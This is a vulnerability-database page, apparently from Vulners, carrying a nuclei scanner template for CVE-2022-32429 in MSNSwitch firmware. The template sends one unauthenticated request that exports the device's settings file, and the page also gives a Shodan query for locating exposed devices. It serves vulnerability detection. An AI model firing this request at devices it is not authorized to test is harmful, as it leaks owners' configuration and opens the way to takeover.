Lucene search
K

MSNSwitch Firmware MNT.2408 - Authentication Bypass

šŸ—“ļøĀ 02 Jul 2026Ā 09:36:57Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 30Ā Views

MSNSwitch Firmware MNT.2408 - Authentication Bypas

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
MSNSwitch Firmware MNT.2408 - Remote Code Exectuion Exploit
11 Nov 202200:00
–zdt
ATTACKERKB
CVE-2022-32429
10 Aug 202220:15
–attackerkb
Circl
CVE-2022-32429
11 Aug 202200:32
–circl
CNNVD
MSNSwitch ęŽˆęƒé—®é¢˜ę¼ę“ž
10 Aug 202200:00
–cnnvd
CVE
CVE-2022-32429
9 Aug 202200:00
–cve
Cvelist
CVE-2022-32429
9 Aug 202200:00
–cvelist
Exploit DB
MSNSwitch Firmware MNT.2408 - Remote Code Execution
11 Nov 202200:00
–exploitdb
NVD
CVE-2022-32429
10 Aug 202220:15
–nvd
OSV
CVE-2022-32429
10 Aug 202220:15
–osv
Packet Storm
MSNSwitch Firmware MNT.2408 Remote Code Execution
11 Nov 202200:00
–packetstorm
Rows per page
id: CVE-2022-32429

info:
  name: MSNSwitch Firmware MNT.2408 - Authentication Bypass
  author: theabhinavgaur
  severity: critical
  description: |
    MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
  reference:
    - https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
    - https://elifulkerson.com/CVE-2022-32429/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32429
    - http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-32429
    cwe-id: CWE-287
    epss-score: 0.7572
    epss-percentile: 0.99461
    cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: megatech
    product: msnswitch_firmware
    shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
  tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SSID1"

      - type: regex
        part: header
        regex:
          - 'filename="Settings(.*).dat'
          - 'application/octet-stream'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220799f1d77a1c149219ae6f8797dfeefbda8ecd85282946b8b3708cb14e4defe85022100fa85d72152340aeded852813d8b256cb0f5ac580fb2693ed2dadd5b7ebbbe3f1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.19.8
EPSS0.7572
30